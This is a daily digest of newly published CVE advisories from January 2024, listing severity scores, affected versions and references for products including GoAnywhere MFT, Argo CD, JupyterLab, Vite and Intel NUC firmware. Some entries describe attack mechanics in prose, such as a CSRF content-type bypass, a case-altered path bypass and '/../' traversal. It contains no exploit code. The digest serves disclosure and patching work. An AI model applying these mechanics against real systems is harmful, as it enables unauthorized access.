Latest vulnerabilities [Monday, January 22, 2024 + weekend]

Latest vulnerabilities [Monday, January 22, 2024 + weekend]
{{titre}}

Last update performed on 01/22/2024 at 11:57:07 PM

(4) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : cert.org.tw

Vulnerability ID : CVE-2023-5716

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission.

CVE ID : CVE-2023-5716
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7666-fffce-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-610


Source : wordfence.com

Vulnerability ID : CVE-2024-0705

First published on : 19-01-2024 10:15:34
Last modified on : 19-01-2024 15:56:26

Description :
The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVE ID : CVE-2024-0705
Source : security@wordfence.com
CVSS Score : 9.8

References :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve | source : security@wordfence.com


Source : df4dee71-de3a-4139-9588-11b62fe6c0ff

Vulnerability ID : CVE-2024-0204

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

CVE ID : CVE-2024-0204
Source : df4dee71-de3a-4139-9588-11b62fe6c0ff
CVSS Score : 9.8

References :
https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml | source : df4dee71-de3a-4139-9588-11b62fe6c0ff
https://www.fortra.com/security/advisory/fi-2024-001 | source : df4dee71-de3a-4139-9588-11b62fe6c0ff

Vulnerability : CWE-425


Source : huntr.dev

Vulnerability ID : CVE-2024-0521

First published on : 20-01-2024 21:15:43
Last modified on : 22-01-2024 14:01:14

Description :
Code Injection in paddlepaddle/paddle

CVE ID : CVE-2024-0521
Source : security@huntr.dev
CVSS Score : 9.3

References :
https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453 | source : security@huntr.dev

Vulnerability : CWE-94


(26) HIGH VULNERABILITIES [7.0, 8.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-40683

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.

CVE ID : CVE-2023-40683
Source : psirt@us.ibm.com
CVSS Score : 8.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/264005 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107774 | source : psirt@us.ibm.com

Vulnerability : CWE-264


Source : mitre.org

Vulnerability ID : CVE-2024-23768

First published on : 22-01-2024 03:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Dremio before 24.3.1 allows path traversal. An authenticated user who has no privileges on certain folders (and the files and datasets in these folders) can access these folders, files, and datasets. To be successful, the user must have access to the source and at least one folder in the source. Affected versions are: 24.0.0 through 24.3.0, 23.0.0 through 23.2.3, and 22.0.0 through 22.2.2. Fixed versions are: 24.3.1 and later, 23.2.4 and later, and 22.2.3 and later.

CVE ID : CVE-2024-23768
Source : cve@mitre.org
CVSS Score : 8.8

References :
https://docs.dremio.com/current/reference/bulletins/2024-01-12-01 | source : cve@mitre.org


Source : dragos.com

Vulnerability ID : CVE-2022-45790

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 19:10:26

Description :
The Omron FINS protocol has an authenticated feature to prevent access to memory regions. Authentication is susceptible to bruteforce attack, which may allow an adversary to gain access to protected memory. This access can allow overwrite of values including programmed logic.

CVE ID : CVE-2022-45790
Source : ot-cert@dragos.com
CVSS Score : 8.6

References :
https://www.cisa.gov/news-events/ics-advisories/icsa-23-262-05 | source : ot-cert@dragos.com
https://www.dragos.com/advisory/omron-plc-and-engineering-software-network-and-file-format-access/ | source : ot-cert@dragos.com
https://www.fa.omron.co.jp/product/security/assets/pdf/en/OMSR-2023-010_en.pdf | source : ot-cert@dragos.com

Vulnerability : CWE-307


Vulnerability ID : CVE-2022-45792

First published on : 22-01-2024 18:15:19
Last modified on : 22-01-2024 19:10:26

Description :
Project files may contain malicious contents which the software will use to create files on the filesystem. This allows directory traversal and overwriting files with the privileges of the logged-in user.

CVE ID : CVE-2022-45792
Source : ot-cert@dragos.com
CVSS Score : 7.8

References :
https://www.dragos.com/advisory/omron-plc-and-engineering-software-network-and-file-format-access/ | source : ot-cert@dragos.com

Vulnerability : CWE-22


Source : github.com

Vulnerability ID : CVE-2024-22424

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22424
Source : security-advisories@github.com
CVSS Score : 8.3

References :
https://github.com/argoproj/argo-cd/issues/2496 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/pull/16860 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg | source : security-advisories@github.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2024-22421

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix.

CVE ID : CVE-2024-22421
Source : security-advisories@github.com
CVSS Score : 7.6

References :
https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6 | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947 | source : security-advisories@github.com

Vulnerability : CWE-200
Vulnerability : CWE-23


Vulnerability ID : CVE-2024-22422

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22422
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | source : security-advisories@github.com
https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q | source : security-advisories@github.com

Vulnerability : CWE-754


Vulnerability ID : CVE-2024-23331

First published on : 19-01-2024 20:15:14
Last modified on : 19-01-2024 22:52:48

Description :
Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers.

CVE ID : CVE-2024-23331
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5 | source : security-advisories@github.com
https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw | source : security-advisories@github.com
https://vitejs.dev/config/server-options.html#server-fs-deny | source : security-advisories@github.com

Vulnerability : CWE-178
Vulnerability : CWE-200
Vulnerability : CWE-284


Source : patchstack.com

Vulnerability ID : CVE-2022-40700

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.

CVE ID : CVE-2022-40700
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Source : vuldb.com

Vulnerability ID : CVE-2024-0778

First published on : 22-01-2024 16:15:08
Last modified on : 22-01-2024 19:10:26

Description :
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.

CVE ID : CVE-2024-0778
Source : cna@vuldb.com
CVSS Score : 8.0

References :
https://github.com/dezhoutorizhao/cve/blob/main/rce.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251696 | source : cna@vuldb.com
https://vuldb.com/?id.251696 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2024-0712

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0712
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251538 | source : cna@vuldb.com
https://vuldb.com/?id.251538 | source : cna@vuldb.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-0739

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0739
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://note.zhaoj.in/share/vLswXhWxUrs8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251562 | source : cna@vuldb.com
https://vuldb.com/?id.251562 | source : cna@vuldb.com

Vulnerability : CWE-502


Source : intel.com

Vulnerability ID : CVE-2023-32272

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32272
Source : secure@intel.com
CVSS Score : 7.9

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-427


Vulnerability ID : CVE-2023-28738

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28738
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-28743

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28743
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-29495

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29495
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-38587

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38587
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-42429

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42429
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-42766

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42766
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-32544

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32544
Source : secure@intel.com
CVSS Score : 7.3

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-284


Source : lenovo.com

Vulnerability ID : CVE-2023-6043

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6043
Source : psirt@lenovo.com
CVSS Score : 7.8

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-295


Source : snyk.io

Vulnerability ID : CVE-2024-21484

First published on : 22-01-2024 05:15:08
Last modified on : 22-01-2024 14:01:09

Description :
Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting this vulnerability. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround This vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.

CVE ID : CVE-2024-21484
Source : report@snyk.io
CVSS Score : 7.5

References :
https://github.com/kjur/jsrsasign/issues/598 | source : report@snyk.io
https://github.com/kjur/jsrsasign/releases/tag/11.0.0 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-6070734 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBKJUR-6070733 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-6070732 | source : report@snyk.io
https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-6070731 | source : report@snyk.io

Vulnerability : CWE-203


Source : vmware.com

Vulnerability ID : CVE-2024-22233

First published on : 22-01-2024 13:15:25
Last modified on : 22-01-2024 14:01:09

Description :
In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpath Typically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.

CVE ID : CVE-2024-22233
Source : security@vmware.com
CVSS Score : 7.5

References :
https://spring.io/security/cve-2024-22233/ | source : security@vmware.com


Source : splunk.com

Vulnerability ID : CVE-2024-23678

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows.

CVE ID : CVE-2024-23678
Source : prodsec@splunk.com
CVSS Score : 7.5

References :
https://advisory.splunk.com/advisories/SVD-2024-0108 | source : prodsec@splunk.com

Vulnerability : CWE-20


Source : wordfence.com

Vulnerability ID : CVE-2023-7063

First published on : 20-01-2024 09:15:07
Last modified on : 22-01-2024 14:01:14

Description :
The WPForms Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form submission parameters in all versions up to, and including, 1.8.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE ID : CVE-2023-7063
Source : security@wordfence.com
CVSS Score : 7.2

References :
https://wpforms.com/docs/how-to-view-recent-changes-to-the-wpforms-plugin-changelog/#1-8-5-4-2023-12-27 | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve | source : security@wordfence.com


Source : redhat.com

Vulnerability ID : CVE-2023-6531

First published on : 21-01-2024 10:15:07
Last modified on : 22-01-2024 14:01:14

Description :
A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector's deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on.

CVE ID : CVE-2023-6531
Source : secalert@redhat.com
CVSS Score : 7.0

References :
https://access.redhat.com/security/cve/CVE-2023-6531 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2253034 | source : secalert@redhat.com
https://lore.kernel.org/all/c716c88321939156909cfa1bd8b0faaf1c804103.1701868795.git.asml.silence@gmail.com/ | source : secalert@redhat.com

Vulnerability : CWE-362


(56) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-38738

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.

CVE ID : CVE-2023-38738
Source : psirt@us.ibm.com
CVSS Score : 6.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/262594 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107775 | source : psirt@us.ibm.com

Vulnerability : CWE-257


Vulnerability ID : CVE-2023-50963

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.

CVE ID : CVE-2023-50963
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/276101 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7106918 | source : psirt@us.ibm.com

Vulnerability : CWE-601


Vulnerability ID : CVE-2023-50308

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.5 under certain circumstances could allow an authenticated user to the database to cause a denial of service when a statement is run on columnar tables. IBM X-Force ID: 273393.

CVE ID : CVE-2023-50308
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/273393 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105506 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-27859

First published on : 22-01-2024 20:15:46
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 10.1, 10.5, and 11.1 could allow a remote user to execute arbitrary code caused by installing like named jar files across multiple databases. A user could exploit this by installing a malicious jar file that overwrites the existing like named jar file in another database. IBM X-Force ID: 249205.

CVE ID : CVE-2023-27859
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/249205 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105503 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-45193

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 federated server is vulnerable to a denial of service when a specially crafted cursor is used. IBM X-Force ID: 268759.

CVE ID : CVE-2023-45193
Source : psirt@us.ibm.com
CVSS Score : 5.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/268759 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105501 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47152

First published on : 22-01-2024 20:15:46
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 is vulnerable to an insecure cryptographic algorithm and to information disclosure in stack trace under exceptional conditions. IBM X-Force ID: 270730.

CVE ID : CVE-2023-47152
Source : psirt@us.ibm.com
CVSS Score : 5.9

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270730 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105605 | source : psirt@us.ibm.com


Vulnerability ID : CVE-2023-35020

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.

CVE ID : CVE-2023-35020
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/257874 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107788 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-32337

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.

CVE ID : CVE-2023-32337
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/255288 | source : psirt@us.ibm.com
